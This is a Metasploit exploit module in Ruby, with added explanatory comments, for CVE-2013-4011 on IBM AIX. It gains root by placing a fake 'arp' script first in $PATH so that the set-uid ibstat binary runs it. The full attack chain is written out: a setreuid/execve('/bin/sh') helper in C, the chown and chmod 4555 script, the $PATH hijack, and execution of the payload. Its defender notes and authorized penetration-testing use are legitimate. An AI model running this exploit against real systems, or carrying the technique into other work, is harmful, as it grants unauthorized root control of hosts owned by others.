GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/aix/local/ibstat_path.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Local privilege-escalation module for CVE-2013-4011: the set-uid root
# `ibstat` binary on AIX resolves `arp` through the caller's $PATH, so a
# writable directory placed first in $PATH lets an attacker-controlled
# `arp` run with root privileges.
#
# Defender notes grounded in this module's behaviour: it writes a file
# named `arp` (mode 0555) plus a randomly named binary (and, when gcc is
# available, its `.c` source) into WritableDir (default /tmp), rewrites
# $PATH for the duration of the trigger, and invokes `ibstat -a -i <iface>`.
# All dropped files are registered with FileDropper for cleanup.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  # Registers module metadata, targets and datastore options.
  #
  # @param info [Hash] module info hash merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ibstat $PATH Privilege Escalation',
        'Description' => %q{
          This module exploits the trusted $PATH environment variable of the SUID binary "ibstat".
        },
        'Author' => [
          'Kristian Erik Hermansen', # original author
          'Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>', # Metasploit module
          'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>' # Metasploit module
        ],
        'References' => [
          ['CVE', '2013-4011'],
          ['OSVDB', '95420'],
          ['BID', '61287'],
          ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827'],
          ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756']
        ],
        'Platform' => %w[unix aix],
        'Arch' => ARCH_CMD,
        # The final stage runs payload.encoded through cmd_exec, so only a
        # perl-based command payload is compatible.
        'Payload' => {
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'perl'
          }
        },
        'SessionTypes' => %w[shell],
        'Targets' => [
          ['IBM AIX Version 6.1', {}],
          ['IBM AIX Version 7.1', {}]
        ],
        'DefaultTarget' => 1,
        'DisclosureDate' => '2013-09-24',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # Files are dropped into WritableDir; see exploit for the list.
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('IBSTAT_PATH', [true, 'Path to ibstat executable', '/usr/bin/ibstat'])
    ])
    register_advanced_options([
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ])
  end

  # @return [String] the configured path to the ibstat binary (IBSTAT_PATH)
  def ibstat_path
    datastore['IBSTAT_PATH']
  end

  # Reports whether a root-owned set-uid `ibstat` is present.
  #
  # NOTE(review): the find runs over /usr/sbin/ regardless of IBSTAT_PATH
  # (whose default is /usr/bin/ibstat), while the resulting message reports
  # ibstat_path. Confirm which location the target actually uses.
  #
  # @return [Msf::Exploit::CheckCode] Appears when a matching file is found,
  #   Safe otherwise
  def check
    find_output = cmd_exec('find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null')

    return CheckCode::Safe("#{ibstat_path} is not set-uid root") unless find_output.to_s.include?('ibstat')

    CheckCode::Appears("#{ibstat_path} is set-uid root")
  end

  # Drops the helper files, rewrites $PATH, triggers ibstat, then runs the
  # payload only if a root shell was obtained.
  #
  # Artifacts (all registered for cleanup): root_file, root_file.c when
  # compiled with gcc, and WritableDir/arp.
  def exploit
    root_file = "#{datastore['WritableDir']}/#{rand_text_alpha(8)}"
    arp_file = "#{datastore['WritableDir']}/arp"
    # Source for the helper binary: once it is root-owned and set-uid it
    # spawns /bin/sh with uid/gid 0.
    c_file = %^#include <stdio.h>

int main()
{
    setreuid(0,0);
    setregid(0,0);
    execve("/bin/sh",NULL,NULL);
    return 0;
}
^
    # Replacement `arp` script: executed by ibstat as root via $PATH, it
    # makes root_file root-owned and set-uid (mode 4555).
    arp = %(#!/bin/sh

chown root #{root_file}
chmod 4555 #{root_file}
)

    if gcc_installed?
      print_status("Dropping file #{root_file}.c...")
      write_file("#{root_file}.c", c_file)

      print_status('Compiling source...')
      cmd_exec("gcc -o #{root_file} #{root_file}.c")
      print_status('Compilation completed')

      register_file_for_cleanup("#{root_file}.c")
    else
      # Without gcc, a copy of /bin/sh takes the role of the helper binary.
      cmd_exec("cp /bin/sh #{root_file}")
    end

    register_file_for_cleanup(root_file)

    print_status('Writing custom arp file...')
    write_file(arp_file, arp)
    register_file_for_cleanup(arp_file)
    cmd_exec("chmod 0555 #{arp_file}")
    print_status('Custom arp file written')

    # Original $PATH is saved so it can be restored after the trigger.
    print_status('Updating $PATH environment variable...')
    path_env = cmd_exec('echo $PATH')
    cmd_exec("PATH=#{datastore['WritableDir']}:$PATH")
    cmd_exec('export PATH')

    # ibstat needs an interface argument; pick the first Available
    # non-loopback interface from lsdev, falling back to en0.
    print_status('Finding interface name...')
    iface = ''
    cmd_exec('lsdev -Cc if').each_line do |line|
      next unless line.match(/^[a-z]+[0-9]+\s+Available/) && !line.match(/^lo[0-9]/)

      iface = line.split(/\s+/)[0]
      print_status("Found interface #{iface}.")
      break
    end

    if iface == ''
      iface = 'en0'
      print_status('Found no interface, defaulting to en0.')
    end

    # NOTE(review): status message has a typo ("vulnerablity"); it is a
    # runtime string and is left unchanged here.
    print_status('Triggering vulnerablity...')
    cmd_exec("#{ibstat_path} -a -i #{iface} 2>/dev/null >/dev/null")

    # The $PATH variable must be restored before the payload is executed
    # in cases where an euid root shell was gained
    print_status('Restoring $PATH environment variable...')
    cmd_exec("PATH=#{path_env}")
    cmd_exec('export PATH')

    # Run the (now set-uid) helper, then verify with `id` before staging.
    cmd_exec(root_file)
    print_status('Checking root privileges...')

    if is_root?
      print_status('Executing payload...')
      cmd_exec(payload.encoded)
    end
  end

  # Checks for a gcc binary via `whereis -b gcc`; any path in the output
  # (a '/' character) counts as found.
  #
  # @return [Boolean] true when gcc appears to be installed
  def gcc_installed?
    print_status('Checking if gcc exists...')
    gcc_whereis_output = cmd_exec('whereis -b gcc')

    if gcc_whereis_output.to_s.include?('/')
      print_good('gcc found!')
      return true
    end

    print_status('gcc not found. Using /bin/sh from local system')
    false
  end

  # Inspects `id` output for a root uid or euid.
  #
  # The euid check runs first because 'euid=0(root)' also contains the
  # substring 'uid=0(root)'.
  #
  # @return [Boolean] true when the session is running as root
  def is_root?
    id_output = cmd_exec('id')

    if id_output.include?('euid=0(root)')
      print_good('Got root! (euid)')
      return true
    end

    if id_output.include?('uid=0(root)')
      print_good('Got root!')
      return true
    end

    print_error('Exploit failed')
    false
  end
end